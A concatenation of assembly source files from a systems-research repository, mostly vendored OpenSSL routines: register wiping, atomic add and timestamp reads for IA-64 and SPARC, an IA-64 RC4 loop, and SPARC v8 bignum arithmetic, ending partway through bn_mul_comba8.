.type __jmp_runtime_nosave, @function
__jmp_runtime_nosave:
/* jump into runtime function */
movq %rsi, %rsp
movq %rdi, %rsi
/* jump into runtime code */
jmpq *%rsi
|
AIFM-sys/AIFM
| 2,571
|
shenango/apps/parsec/pkgs/libs/ssl/src/crypto/ia64cpuid.S
|
// Works on all IA-64 platforms: Linux, HP-UX, Win64i...
// On Win64i compile with ias.exe.
.text
.global OPENSSL_rdtsc#
.proc OPENSSL_rdtsc#
OPENSSL_rdtsc:
{ .mib; mov r8=ar.itc
br.ret.sptk.many b0 };;
.endp OPENSSL_rdtsc#
.global OPENSSL_atomic_add#
.proc OPENSSL_atomic_add#
.align 32
OPENSSL_atomic_add:
{ .mii; ld4 r2=[r32]
nop.i 0
nop.i 0 };;
.Lspin:
{ .mii; mov ar.ccv=r2
add r8=r2,r33
mov r3=r2 };;
{ .mmi; mf
cmpxchg4.acq r2=[r32],r8,ar.ccv
nop.i 0 };;
{ .mib; cmp.ne p6,p0=r2,r3
nop.i 0
(p6) br.dpnt .Lspin };;
{ .mib; nop.m 0
sxt4 r8=r8
br.ret.sptk.many b0 };;
.endp OPENSSL_atomic_add#
// Returns a structure comprising pointer to the top of stack of
// the caller and pointer beyond backing storage for the current
// register frame. The latter is required, because it might be
// insufficient to wipe backing storage for the current frame
// (as this procedure does), one might have to go further, toward
// higher addresses to reach for whole "retroactively" saved
// context...
.global OPENSSL_wipe_cpu#
.proc OPENSSL_wipe_cpu#
.align 32
OPENSSL_wipe_cpu:
.prologue
.fframe 0
.save ar.pfs,r2
.save ar.lc,r3
{ .mib; alloc r2=ar.pfs,0,96,0,96
mov r3=ar.lc
brp.loop.imp .L_wipe_top,.L_wipe_end-16
};;
{ .mii; mov r9=ar.bsp
mov r8=pr
mov ar.lc=96 };;
.body
{ .mii; add r9=96*8-8,r9
mov ar.ec=1 };;
// One can sweep double as fast, but then we can't quarantee
// that backing storage is wiped...
.L_wipe_top:
{ .mfi; st8 [r9]=r0,-8
mov f127=f0
mov r127=r0 }
{ .mfb; nop.m 0
nop.f 0
br.ctop.sptk .L_wipe_top };;
.L_wipe_end:
{ .mfi; mov r11=r0
mov f6=f0
mov r14=r0 }
{ .mfi; mov r15=r0
mov f7=f0
mov r16=r0 }
{ .mfi; mov r17=r0
mov f8=f0
mov r18=r0 }
{ .mfi; mov r19=r0
mov f9=f0
mov r20=r0 }
{ .mfi; mov r21=r0
mov f10=f0
mov r22=r0 }
{ .mfi; mov r23=r0
mov f11=f0
mov r24=r0 }
{ .mfi; mov r25=r0
mov f12=f0
mov r26=r0 }
{ .mfi; mov r27=r0
mov f13=f0
mov r28=r0 }
{ .mfi; mov r29=r0
mov f14=f0
mov r30=r0 }
{ .mfi; mov r31=r0
mov f15=f0
nop.i 0 }
{ .mfi; mov f16=f0 }
{ .mfi; mov f17=f0 }
{ .mfi; mov f18=f0 }
{ .mfi; mov f19=f0 }
{ .mfi; mov f20=f0 }
{ .mfi; mov f21=f0 }
{ .mfi; mov f22=f0 }
{ .mfi; mov f23=f0 }
{ .mfi; mov f24=f0 }
{ .mfi; mov f25=f0 }
{ .mfi; mov f26=f0 }
{ .mfi; mov f27=f0 }
{ .mfi; mov f28=f0 }
{ .mfi; mov f29=f0 }
{ .mfi; mov f30=f0 }
{ .mfi; add r9=96*8+8,r9
mov f31=f0
mov pr=r8,0x1ffff }
{ .mib; mov r8=sp
mov ar.lc=r3
br.ret.sptk b0 };;
.endp OPENSSL_wipe_cpu#
|
AIFM-sys/AIFM
| 4,690
|
shenango/apps/parsec/pkgs/libs/ssl/src/crypto/sparccpuid.S
|
#if defined(__SUNPRO_C) && defined(__sparcv9)
# define ABI64 /* They've said -xarch=v9 at command line */
#elif defined(__GNUC__) && defined(__arch64__)
# define ABI64 /* They've said -m64 at command line */
#endif
#ifdef ABI64
.register %g2,#scratch
.register %g3,#scratch
# define FRAME -192
# define BIAS 2047
#else
# define FRAME -96
# define BIAS 0
#endif
.text
.align 32
.global OPENSSL_wipe_cpu
.type OPENSSL_wipe_cpu,#function
! Keep in mind that this does not excuse us from wiping the stack!
! This routine wipes registers, but not the backing store [which
! resides on the stack, toward lower addresses]. To facilitate for
! stack wiping I return pointer to the top of stack of the *caller*.
OPENSSL_wipe_cpu:
save %sp,FRAME,%sp
nop
#ifdef __sun
#include <sys/trap.h>
ta ST_CLEAN_WINDOWS
#else
call .walk.reg.wins
#endif
nop
call .PIC.zero.up
mov .zero-(.-4),%o0
ldd [%o0],%f0
subcc %g0,1,%o0
! Following is V9 "rd %ccr,%o0" instruction. However! V8
! specification says that it ("rd %asr2,%o0" in V8 terms) does
! not cause illegal_instruction trap. It therefore can be used
! to determine if the CPU the code is executing on is V8- or
! V9-compliant, as V9 returns a distinct value of 0x99,
! "negative" and "borrow" bits set in both %icc and %xcc.
.word 0x91408000 !rd %ccr,%o0
cmp %o0,0x99
bne .v8
nop
! Even though we do not use %fp register bank,
! we wipe it as memcpy might have used it...
.word 0xbfa00040 !fmovd %f0,%f62
.word 0xbba00040 !...
.word 0xb7a00040
.word 0xb3a00040
.word 0xafa00040
.word 0xaba00040
.word 0xa7a00040
.word 0xa3a00040
.word 0x9fa00040
.word 0x9ba00040
.word 0x97a00040
.word 0x93a00040
.word 0x8fa00040
.word 0x8ba00040
.word 0x87a00040
.word 0x83a00040 !fmovd %f0,%f32
.v8: fmovs %f1,%f31
clr %o0
fmovs %f0,%f30
clr %o1
fmovs %f1,%f29
clr %o2
fmovs %f0,%f28
clr %o3
fmovs %f1,%f27
clr %o4
fmovs %f0,%f26
clr %o5
fmovs %f1,%f25
clr %o7
fmovs %f0,%f24
clr %l0
fmovs %f1,%f23
clr %l1
fmovs %f0,%f22
clr %l2
fmovs %f1,%f21
clr %l3
fmovs %f0,%f20
clr %l4
fmovs %f1,%f19
clr %l5
fmovs %f0,%f18
clr %l6
fmovs %f1,%f17
clr %l7
fmovs %f0,%f16
clr %i0
fmovs %f1,%f15
clr %i1
fmovs %f0,%f14
clr %i2
fmovs %f1,%f13
clr %i3
fmovs %f0,%f12
clr %i4
fmovs %f1,%f11
clr %i5
fmovs %f0,%f10
clr %g1
fmovs %f1,%f9
clr %g2
fmovs %f0,%f8
clr %g3
fmovs %f1,%f7
clr %g4
fmovs %f0,%f6
clr %g5
fmovs %f1,%f5
fmovs %f0,%f4
fmovs %f1,%f3
fmovs %f0,%f2
add %fp,BIAS,%i0 ! return pointer to callers top of stack
ret
restore
.zero: .long 0x0,0x0
.PIC.zero.up:
retl
add %o0,%o7,%o0
#ifdef DEBUG
.global walk_reg_wins
.type walk_reg_wins,#function
walk_reg_wins:
#endif
.walk.reg.wins:
save %sp,FRAME,%sp
cmp %i7,%o7
be 2f
clr %o0
cmp %o7,0 ! compiler never cleans %o7...
be 1f ! could have been a leaf function...
clr %o1
call .walk.reg.wins
nop
1: clr %o2
clr %o3
clr %o4
clr %o5
clr %o7
clr %l0
clr %l1
clr %l2
clr %l3
clr %l4
clr %l5
clr %l6
clr %l7
add %o0,1,%i0 ! used for debugging
2: ret
restore
.size OPENSSL_wipe_cpu,.-OPENSSL_wipe_cpu
.global OPENSSL_atomic_add
.type OPENSSL_atomic_add,#function
OPENSSL_atomic_add:
#ifndef ABI64
subcc %g0,1,%o2
.word 0x95408000 !rd %ccr,%o2, see comment above
cmp %o2,0x99
be .v9
nop
save %sp,FRAME,%sp
ba .enter
nop
#ifdef __sun
! Note that you don't have to link with libthread to call thr_yield,
! as libc provides a stub, which is overloaded the moment you link
! with *either* libpthread or libthread...
#define YIELD_CPU thr_yield
#else
! applies at least to Linux and FreeBSD... Feedback expected...
#define YIELD_CPU sched_yield
#endif
.spin: call YIELD_CPU
nop
.enter: ld [%i0],%i2
cmp %i2,-4096
be .spin
mov -1,%i2
swap [%i0],%i2
cmp %i2,-1
be .spin
add %i2,%i1,%i2
stbar
st %i2,[%i0]
sra %i2,%g0,%i0
ret
restore
.v9:
#endif
ld [%o0],%o2
1: add %o1,%o2,%o3
.word 0xd7e2100a !cas [%o0],%o2,%o3, compare [%o0] with %o2 and swap %o3
cmp %o2,%o3
bne 1b
mov %o3,%o2 ! cas is always fetching to dest. register
add %o1,%o2,%o0 ! OpenSSL expects the new value
retl
sra %o0,%g0,%o0 ! we return signed int, remember?
.size OPENSSL_atomic_add,.-OPENSSL_atomic_add
.global OPENSSL_rdtsc
subcc %g0,1,%o0
.word 0x91408000 !rd %ccr,%o0
cmp %o0,0x99
bne .notsc
xor %o0,%o0,%o0
save %sp,FRAME-16,%sp
mov 513,%o0 !SI_PLATFORM
add %sp,BIAS+16,%o1
call sysinfo
mov 256,%o2
add %sp,BIAS-16,%o1
ld [%o1],%l0
ld [%o1+4],%l1
ld [%o1+8],%l2
mov %lo('SUNW'),%l3
ret
restore
.notsc:
retl
nop
.type OPENSSL_rdtsc,#function
.size OPENSSL_rdtsc,.-OPENSSL_atomic_add
|
AIFM-sys/AIFM
| 5,981
|
shenango/apps/parsec/pkgs/libs/ssl/src/crypto/rc4/asm/rc4-ia64.S
|
// ====================================================================
// Written by Andy Polyakov <appro@fy.chalmers.se> for the OpenSSL
// project.
//
// Rights for redistribution and usage in source and binary forms are
// granted according to the OpenSSL license. Warranty of any kind is
// disclaimed.
// ====================================================================
.ident "rc4-ia64.S, Version 2.0"
.ident "IA-64 ISA artwork by Andy Polyakov <appro@fy.chalmers.se>"
// What's wrong with compiler generated code? Because of the nature of
// C language, compiler doesn't [dare to] reorder load and stores. But
// being memory-bound, RC4 should benefit from reorder [on in-order-
// execution core such as IA-64]. But what can we reorder? At the very
// least we can safely reorder references to key schedule in respect
// to input and output streams. Secondly, from the first [close] glance
// it appeared that it's possible to pull up some references to
// elements of the key schedule itself. Original rationale ["prior
// loads are not safe only for "degenerated" key schedule, when some
// elements equal to the same value"] was kind of sloppy. I should have
// formulated as it really was: if we assume that pulling up reference
// to key[x+1] is not safe, then it would mean that key schedule would
// "degenerate," which is never the case. The problem is that this
// holds true in respect to references to key[x], but not to key[y].
// Legitimate "collisions" do occur within every 256^2 bytes window.
// Fortunately there're enough free instruction slots to keep prior
// reference to key[x+1], detect "collision" and compensate for it.
// All this without sacrificing a single clock cycle:-) Throughput is
// ~210MBps on 900MHz CPU, which is is >3x faster than gcc generated
// code and +30% - if compared to HP-UX C. Unrolling loop below should
// give >30% on top of that...
.text
.explicit
#if defined(_HPUX_SOURCE) && !defined(_LP64)
# define ADDP addp4
#else
# define ADDP add
#endif
#ifndef SZ
#define SZ 4 // this is set to sizeof(RC4_INT)
#endif
// SZ==4 seems to be optimal. At least SZ==8 is not any faster, not for
// assembler implementation, while SZ==1 code is ~30% slower.
#if SZ==1 // RC4_INT is unsigned char
# define LDKEY ld1
# define STKEY st1
# define OFF 0
#elif SZ==4 // RC4_INT is unsigned int
# define LDKEY ld4
# define STKEY st4
# define OFF 2
#elif SZ==8 // RC4_INT is unsigned long
# define LDKEY ld8
# define STKEY st8
# define OFF 3
#endif
out=r8; // [expanded] output pointer
inp=r9; // [expanded] output pointer
prsave=r10;
key=r28; // [expanded] pointer to RC4_KEY
ksch=r29; // (key->data+255)[&~(sizeof(key->data)-1)]
xx=r30;
yy=r31;
// void RC4(RC4_KEY *key,size_t len,const void *inp,void *out);
.global RC4#
.proc RC4#
.align 32
.skip 16
RC4:
.prologue
.save ar.pfs,r2
{ .mii; alloc r2=ar.pfs,4,12,0,16
.save pr,prsave
mov prsave=pr
ADDP key=0,in0 };;
{ .mib; cmp.eq p6,p0=0,in1 // len==0?
.save ar.lc,r3
mov r3=ar.lc
(p6) br.ret.spnt.many b0 };; // emergency exit
.body
.rotr dat[4],key_x[4],tx[2],rnd[2],key_y[2],ty[1];
{ .mib; LDKEY xx=[key],SZ // load key->x
add in1=-1,in1 // adjust len for loop counter
nop.b 0 }
{ .mib; ADDP inp=0,in2
ADDP out=0,in3
brp.loop.imp .Ltop,.Lexit-16 };;
{ .mmi; LDKEY yy=[key] // load key->y
add ksch=SZ,key
mov ar.lc=in1 }
{ .mmi; mov key_y[1]=r0 // guarantee inequality
// in first iteration
add xx=1,xx
mov pr.rot=1<<16 };;
{ .mii; nop.m 0
dep key_x[1]=xx,r0,OFF,8
mov ar.ec=3 };; // note that epilogue counter
// is off by 1. I compensate
// for this at exit...
.Ltop:
// The loop is scheduled for 4*(n+2) spin-rate on Itanium 2, which
// theoretically gives asymptotic performance of clock frequency
// divided by 4 bytes per seconds, or 400MBps on 1.6GHz CPU. This is
// for sizeof(RC4_INT)==4. For smaller RC4_INT STKEY inadvertently
// splits the last bundle and you end up with 5*n spin-rate:-(
// Originally the loop was scheduled for 3*n and relied on key
// schedule to be aligned at 256*sizeof(RC4_INT) boundary. But
// *(out++)=dat, which maps to st1, had same effect [inadvertent
// bundle split] and holded the loop back. Rescheduling for 4*n
// made it possible to eliminate dependence on specific alignment
// and allow OpenSSH keep "abusing" our API. Reaching for 3*n would
// require unrolling, sticking to variable shift instruction for
// collecting output [to avoid starvation for integer shifter] and
// copying of key schedule to controlled place in stack [so that
// deposit instruction can serve as substitute for whole
// key->data+((x&255)<<log2(sizeof(key->data[0])))]...
{ .mmi; (p19) st1 [out]=dat[3],1 // *(out++)=dat
(p16) add xx=1,xx // x++
(p18) dep rnd[1]=rnd[1],r0,OFF,8 } // ((tx+ty)&255)<<OFF
{ .mmi; (p16) add key_x[1]=ksch,key_x[1] // &key[xx&255]
(p17) add key_y[1]=ksch,key_y[1] };; // &key[yy&255]
{ .mmi; (p16) LDKEY tx[0]=[key_x[1]] // tx=key[xx]
(p17) LDKEY ty[0]=[key_y[1]] // ty=key[yy]
(p16) dep key_x[0]=xx,r0,OFF,8 } // (xx&255)<<OFF
{ .mmi; (p18) add rnd[1]=ksch,rnd[1] // &key[(tx+ty)&255]
(p16) cmp.ne.unc p20,p21=key_x[1],key_y[1] };;
{ .mmi; (p18) LDKEY rnd[1]=[rnd[1]] // rnd=key[(tx+ty)&255]
(p16) ld1 dat[0]=[inp],1 } // dat=*(inp++)
.pred.rel "mutex",p20,p21
{ .mmi; (p21) add yy=yy,tx[1] // (p16)
(p20) add yy=yy,tx[0] // (p16) y+=tx
(p21) mov tx[0]=tx[1] };; // (p16)
{ .mmi; (p17) STKEY [key_y[1]]=tx[1] // key[yy]=tx
(p17) STKEY [key_x[2]]=ty[0] // key[xx]=ty
(p16) dep key_y[0]=yy,r0,OFF,8 } // &key[yy&255]
{ .mmb; (p17) add rnd[0]=tx[1],ty[0] // tx+=ty
(p18) xor dat[2]=dat[2],rnd[1] // dat^=rnd
br.ctop.sptk .Ltop };;
.Lexit:
{ .mib; STKEY [key]=yy,-SZ // save key->y
mov pr=prsave,0x1ffff
nop.b 0 }
{ .mib; st1 [out]=dat[3],1 // compensate for truncated
// epilogue counter
add xx=-1,xx
nop.b 0 };;
{ .mib; STKEY [key]=xx // save key->x
mov ar.lc=r3
br.ret.sptk.many b0 };;
.endp RC4#
|
AIFM-sys/AIFM
| 28,245
|
shenango/apps/parsec/pkgs/libs/ssl/src/crypto/bn/asm/sparcv8.S
|
.ident "sparcv8.s, Version 1.4"
.ident "SPARC v8 ISA artwork by Andy Polyakov <appro@fy.chalmers.se>"
/*
* ====================================================================
* Written by Andy Polyakov <appro@fy.chalmers.se> for the OpenSSL
* project.
*
* Rights for redistribution and usage in source and binary forms are
* granted according to the OpenSSL license. Warranty of any kind is
* disclaimed.
* ====================================================================
*/
/*
* This is my modest contributon to OpenSSL project (see
* http://www.openssl.org/ for more information about it) and is
* a drop-in SuperSPARC ISA replacement for crypto/bn/bn_asm.c
* module. For updates see http://fy.chalmers.se/~appro/hpe/.
*
* See bn_asm.sparc.v8plus.S for more details.
*/
/*
* Revision history.
*
* 1.1 - new loop unrolling model(*);
* 1.2 - made gas friendly;
* 1.3 - fixed problem with /usr/ccs/lib/cpp;
* 1.4 - some retunes;
*
* (*) see bn_asm.sparc.v8plus.S for details
*/
.section ".text",#alloc,#execinstr
.file "bn_asm.sparc.v8.S"
.align 32
.global bn_mul_add_words
/*
* BN_ULONG bn_mul_add_words(rp,ap,num,w)
* BN_ULONG *rp,*ap;
* int num;
* BN_ULONG w;
*/
bn_mul_add_words:
cmp %o2,0
bg,a .L_bn_mul_add_words_proceed
ld [%o1],%g2
retl
clr %o0
.L_bn_mul_add_words_proceed:
andcc %o2,-4,%g0
bz .L_bn_mul_add_words_tail
clr %o5
.L_bn_mul_add_words_loop:
ld [%o0],%o4
ld [%o1+4],%g3
umul %o3,%g2,%g2
rd %y,%g1
addcc %o4,%o5,%o4
addx %g1,0,%g1
addcc %o4,%g2,%o4
st %o4,[%o0]
addx %g1,0,%o5
ld [%o0+4],%o4
ld [%o1+8],%g2
umul %o3,%g3,%g3
dec 4,%o2
rd %y,%g1
addcc %o4,%o5,%o4
addx %g1,0,%g1
addcc %o4,%g3,%o4
st %o4,[%o0+4]
addx %g1,0,%o5
ld [%o0+8],%o4
ld [%o1+12],%g3
umul %o3,%g2,%g2
inc 16,%o1
rd %y,%g1
addcc %o4,%o5,%o4
addx %g1,0,%g1
addcc %o4,%g2,%o4
st %o4,[%o0+8]
addx %g1,0,%o5
ld [%o0+12],%o4
umul %o3,%g3,%g3
inc 16,%o0
rd %y,%g1
addcc %o4,%o5,%o4
addx %g1,0,%g1
addcc %o4,%g3,%o4
st %o4,[%o0-4]
addx %g1,0,%o5
andcc %o2,-4,%g0
bnz,a .L_bn_mul_add_words_loop
ld [%o1],%g2
tst %o2
bnz,a .L_bn_mul_add_words_tail
ld [%o1],%g2
.L_bn_mul_add_words_return:
retl
mov %o5,%o0
nop
.L_bn_mul_add_words_tail:
ld [%o0],%o4
umul %o3,%g2,%g2
addcc %o4,%o5,%o4
rd %y,%g1
addx %g1,0,%g1
addcc %o4,%g2,%o4
addx %g1,0,%o5
deccc %o2
bz .L_bn_mul_add_words_return
st %o4,[%o0]
ld [%o1+4],%g2
ld [%o0+4],%o4
umul %o3,%g2,%g2
rd %y,%g1
addcc %o4,%o5,%o4
addx %g1,0,%g1
addcc %o4,%g2,%o4
addx %g1,0,%o5
deccc %o2
bz .L_bn_mul_add_words_return
st %o4,[%o0+4]
ld [%o1+8],%g2
ld [%o0+8],%o4
umul %o3,%g2,%g2
rd %y,%g1
addcc %o4,%o5,%o4
addx %g1,0,%g1
addcc %o4,%g2,%o4
st %o4,[%o0+8]
retl
addx %g1,0,%o0
.type bn_mul_add_words,#function
.size bn_mul_add_words,(.-bn_mul_add_words)
.align 32
.global bn_mul_words
/*
* BN_ULONG bn_mul_words(rp,ap,num,w)
* BN_ULONG *rp,*ap;
* int num;
* BN_ULONG w;
*/
bn_mul_words:
cmp %o2,0
bg,a .L_bn_mul_words_proceeed
ld [%o1],%g2
retl
clr %o0
.L_bn_mul_words_proceeed:
andcc %o2,-4,%g0
bz .L_bn_mul_words_tail
clr %o5
.L_bn_mul_words_loop:
ld [%o1+4],%g3
umul %o3,%g2,%g2
addcc %g2,%o5,%g2
rd %y,%g1
addx %g1,0,%o5
st %g2,[%o0]
ld [%o1+8],%g2
umul %o3,%g3,%g3
addcc %g3,%o5,%g3
rd %y,%g1
dec 4,%o2
addx %g1,0,%o5
st %g3,[%o0+4]
ld [%o1+12],%g3
umul %o3,%g2,%g2
addcc %g2,%o5,%g2
rd %y,%g1
inc 16,%o1
st %g2,[%o0+8]
addx %g1,0,%o5
umul %o3,%g3,%g3
addcc %g3,%o5,%g3
rd %y,%g1
inc 16,%o0
addx %g1,0,%o5
st %g3,[%o0-4]
andcc %o2,-4,%g0
nop
bnz,a .L_bn_mul_words_loop
ld [%o1],%g2
tst %o2
bnz,a .L_bn_mul_words_tail
ld [%o1],%g2
.L_bn_mul_words_return:
retl
mov %o5,%o0
nop
.L_bn_mul_words_tail:
umul %o3,%g2,%g2
addcc %g2,%o5,%g2
rd %y,%g1
addx %g1,0,%o5
deccc %o2
bz .L_bn_mul_words_return
st %g2,[%o0]
nop
ld [%o1+4],%g2
umul %o3,%g2,%g2
addcc %g2,%o5,%g2
rd %y,%g1
addx %g1,0,%o5
deccc %o2
bz .L_bn_mul_words_return
st %g2,[%o0+4]
ld [%o1+8],%g2
umul %o3,%g2,%g2
addcc %g2,%o5,%g2
rd %y,%g1
st %g2,[%o0+8]
retl
addx %g1,0,%o0
.type bn_mul_words,#function
.size bn_mul_words,(.-bn_mul_words)
.align 32
.global bn_sqr_words
/*
* void bn_sqr_words(r,a,n)
* BN_ULONG *r,*a;
* int n;
*/
bn_sqr_words:
cmp %o2,0
bg,a .L_bn_sqr_words_proceeed
ld [%o1],%g2
retl
clr %o0
.L_bn_sqr_words_proceeed:
andcc %o2,-4,%g0
bz .L_bn_sqr_words_tail
clr %o5
.L_bn_sqr_words_loop:
ld [%o1+4],%g3
umul %g2,%g2,%o4
st %o4,[%o0]
rd %y,%o5
st %o5,[%o0+4]
ld [%o1+8],%g2
umul %g3,%g3,%o4
dec 4,%o2
st %o4,[%o0+8]
rd %y,%o5
st %o5,[%o0+12]
nop
ld [%o1+12],%g3
umul %g2,%g2,%o4
st %o4,[%o0+16]
rd %y,%o5
inc 16,%o1
st %o5,[%o0+20]
umul %g3,%g3,%o4
inc 32,%o0
st %o4,[%o0-8]
rd %y,%o5
st %o5,[%o0-4]
andcc %o2,-4,%g2
bnz,a .L_bn_sqr_words_loop
ld [%o1],%g2
tst %o2
nop
bnz,a .L_bn_sqr_words_tail
ld [%o1],%g2
.L_bn_sqr_words_return:
retl
clr %o0
.L_bn_sqr_words_tail:
umul %g2,%g2,%o4
st %o4,[%o0]
deccc %o2
rd %y,%o5
bz .L_bn_sqr_words_return
st %o5,[%o0+4]
ld [%o1+4],%g2
umul %g2,%g2,%o4
st %o4,[%o0+8]
deccc %o2
rd %y,%o5
nop
bz .L_bn_sqr_words_return
st %o5,[%o0+12]
ld [%o1+8],%g2
umul %g2,%g2,%o4
st %o4,[%o0+16]
rd %y,%o5
st %o5,[%o0+20]
retl
clr %o0
.type bn_sqr_words,#function
.size bn_sqr_words,(.-bn_sqr_words)
.align 32
.global bn_div_words
/*
* BN_ULONG bn_div_words(h,l,d)
* BN_ULONG h,l,d;
*/
bn_div_words:
wr %o0,%y
udiv %o1,%o2,%o0
retl
nop
.type bn_div_words,#function
.size bn_div_words,(.-bn_div_words)
.align 32
.global bn_add_words
/*
* BN_ULONG bn_add_words(rp,ap,bp,n)
* BN_ULONG *rp,*ap,*bp;
* int n;
*/
bn_add_words:
cmp %o3,0
bg,a .L_bn_add_words_proceed
ld [%o1],%o4
retl
clr %o0
.L_bn_add_words_proceed:
andcc %o3,-4,%g0
bz .L_bn_add_words_tail
clr %g1
ba .L_bn_add_words_warn_loop
addcc %g0,0,%g0 ! clear carry flag
.L_bn_add_words_loop:
ld [%o1],%o4
.L_bn_add_words_warn_loop:
ld [%o2],%o5
ld [%o1+4],%g3
ld [%o2+4],%g4
dec 4,%o3
addxcc %o5,%o4,%o5
st %o5,[%o0]
ld [%o1+8],%o4
ld [%o2+8],%o5
inc 16,%o1
addxcc %g3,%g4,%g3
st %g3,[%o0+4]
ld [%o1-4],%g3
ld [%o2+12],%g4
inc 16,%o2
addxcc %o5,%o4,%o5
st %o5,[%o0+8]
inc 16,%o0
addxcc %g3,%g4,%g3
st %g3,[%o0-4]
addx %g0,0,%g1
andcc %o3,-4,%g0
bnz,a .L_bn_add_words_loop
addcc %g1,-1,%g0
tst %o3
bnz,a .L_bn_add_words_tail
ld [%o1],%o4
.L_bn_add_words_return:
retl
mov %g1,%o0
.L_bn_add_words_tail:
addcc %g1,-1,%g0
ld [%o2],%o5
addxcc %o5,%o4,%o5
addx %g0,0,%g1
deccc %o3
bz .L_bn_add_words_return
st %o5,[%o0]
ld [%o1+4],%o4
addcc %g1,-1,%g0
ld [%o2+4],%o5
addxcc %o5,%o4,%o5
addx %g0,0,%g1
deccc %o3
bz .L_bn_add_words_return
st %o5,[%o0+4]
ld [%o1+8],%o4
addcc %g1,-1,%g0
ld [%o2+8],%o5
addxcc %o5,%o4,%o5
st %o5,[%o0+8]
retl
addx %g0,0,%o0
.type bn_add_words,#function
.size bn_add_words,(.-bn_add_words)
.align 32
.global bn_sub_words
/*
* BN_ULONG bn_sub_words(rp,ap,bp,n)
* BN_ULONG *rp,*ap,*bp;
* int n;
*/
bn_sub_words:
cmp %o3,0
bg,a .L_bn_sub_words_proceed
ld [%o1],%o4
retl
clr %o0
.L_bn_sub_words_proceed:
andcc %o3,-4,%g0
bz .L_bn_sub_words_tail
clr %g1
ba .L_bn_sub_words_warm_loop
addcc %g0,0,%g0 ! clear carry flag
.L_bn_sub_words_loop:
ld [%o1],%o4
.L_bn_sub_words_warm_loop:
ld [%o2],%o5
ld [%o1+4],%g3
ld [%o2+4],%g4
dec 4,%o3
subxcc %o4,%o5,%o5
st %o5,[%o0]
ld [%o1+8],%o4
ld [%o2+8],%o5
inc 16,%o1
subxcc %g3,%g4,%g4
st %g4,[%o0+4]
ld [%o1-4],%g3
ld [%o2+12],%g4
inc 16,%o2
subxcc %o4,%o5,%o5
st %o5,[%o0+8]
inc 16,%o0
subxcc %g3,%g4,%g4
st %g4,[%o0-4]
addx %g0,0,%g1
andcc %o3,-4,%g0
bnz,a .L_bn_sub_words_loop
addcc %g1,-1,%g0
tst %o3
nop
bnz,a .L_bn_sub_words_tail
ld [%o1],%o4
.L_bn_sub_words_return:
retl
mov %g1,%o0
.L_bn_sub_words_tail:
addcc %g1,-1,%g0
ld [%o2],%o5
subxcc %o4,%o5,%o5
addx %g0,0,%g1
deccc %o3
bz .L_bn_sub_words_return
st %o5,[%o0]
nop
ld [%o1+4],%o4
addcc %g1,-1,%g0
ld [%o2+4],%o5
subxcc %o4,%o5,%o5
addx %g0,0,%g1
deccc %o3
bz .L_bn_sub_words_return
st %o5,[%o0+4]
ld [%o1+8],%o4
addcc %g1,-1,%g0
ld [%o2+8],%o5
subxcc %o4,%o5,%o5
st %o5,[%o0+8]
retl
addx %g0,0,%o0
.type bn_sub_words,#function
.size bn_sub_words,(.-bn_sub_words)
#define FRAME_SIZE -96
/*
* Here is register usage map for *all* routines below.
*/
#define t_1 %o0
#define t_2 %o1
#define c_1 %o2
#define c_2 %o3
#define c_3 %o4
#define ap(I) [%i1+4*I]
#define bp(I) [%i2+4*I]
#define rp(I) [%i0+4*I]
#define a_0 %l0
#define a_1 %l1
#define a_2 %l2
#define a_3 %l3
#define a_4 %l4
#define a_5 %l5
#define a_6 %l6
#define a_7 %l7
#define b_0 %i3
#define b_1 %i4
#define b_2 %i5
#define b_3 %o5
#define b_4 %g1
#define b_5 %g2
#define b_6 %g3
#define b_7 %g4
.align 32
.global bn_mul_comba8
/*
* void bn_mul_comba8(r,a,b)
* BN_ULONG *r,*a,*b;
*/
bn_mul_comba8:
save %sp,FRAME_SIZE,%sp
ld ap(0),a_0
ld bp(0),b_0
umul a_0,b_0,c_1 !=!mul_add_c(a[0],b[0],c1,c2,c3);
ld bp(1),b_1
rd %y,c_2
st c_1,rp(0) !r[0]=c1;
umul a_0,b_1,t_1 !=!mul_add_c(a[0],b[1],c2,c3,c1);
ld ap(1),a_1
addcc c_2,t_1,c_2
rd %y,t_2
addxcc %g0,t_2,c_3 !=
addx %g0,%g0,c_1
ld ap(2),a_2
umul a_1,b_0,t_1 !mul_add_c(a[1],b[0],c2,c3,c1);
addcc c_2,t_1,c_2 !=
rd %y,t_2
addxcc c_3,t_2,c_3
st c_2,rp(1) !r[1]=c2;
addx c_1,%g0,c_1 !=
umul a_2,b_0,t_1 !mul_add_c(a[2],b[0],c3,c1,c2);
addcc c_3,t_1,c_3
rd %y,t_2
addxcc c_1,t_2,c_1 !=
addx %g0,%g0,c_2
ld bp(2),b_2
umul a_1,b_1,t_1 !mul_add_c(a[1],b[1],c3,c1,c2);
addcc c_3,t_1,c_3 !=
rd %y,t_2
addxcc c_1,t_2,c_1
ld bp(3),b_3
addx c_2,%g0,c_2 !=
umul a_0,b_2,t_1 !mul_add_c(a[0],b[2],c3,c1,c2);
addcc c_3,t_1,c_3
rd %y,t_2
addxcc c_1,t_2,c_1 !=
addx c_2,%g0,c_2
st c_3,rp(2) !r[2]=c3;
umul a_0,b_3,t_1 !mul_add_c(a[0],b[3],c1,c2,c3);
addcc c_1,t_1,c_1 !=
rd %y,t_2
addxcc c_2,t_2,c_2
addx %g0,%g0,c_3
umul a_1,b_2,t_1 !=!mul_add_c(a[1],b[2],c1,c2,c3);
addcc c_1,t_1,c_1
rd %y,t_2
addxcc c_2,t_2,c_2
addx c_3,%g0,c_3 !=
ld ap(3),a_3
umul a_2,b_1,t_1 !mul_add_c(a[2],b[1],c1,c2,c3);
addcc c_1,t_1,c_1
rd %y,t_2 !=
addxcc c_2,t_2,c_2
addx c_3,%g0,c_3
ld ap(4),a_4
umul a_3,b_0,t_1 !mul_add_c(a[3],b[0],c1,c2,c3);!=
addcc c_1,t_1,c_1
rd %y,t_2
addxcc c_2,t_2,c_2
addx c_3,%g0,c_3 !=
st c_1,rp(3) !r[3]=c1;
umul a_4,b_0,t_1 !mul_add_c(a[4],b[0],c2,c3,c1);
addcc c_2,t_1,c_2
rd %y,t_2 !=
addxcc c_3,t_2,c_3
addx %g0,%g0,c_1
umul a_3,b_1,t_1 !mul_add_c(a[3],b[1],c2,c3,c1);
addcc c_2,t_1,c_2 !=
rd %y,t_2
addxcc c_3,t_2,c_3
addx c_1,%g0,c_1
umul a_2,b_2,t_1 !=!mul_add_c(a[2],b[2],c2,c3,c1);
addcc c_2,t_1,c_2
rd %y,t_2
addxcc c_3,t_2,c_3
addx c_1,%g0,c_1 !=
ld bp(4),b_4
umul a_1,b_3,t_1 !mul_add_c(a[1],b[3],c2,c3,c1);
addcc c_2,t_1,c_2
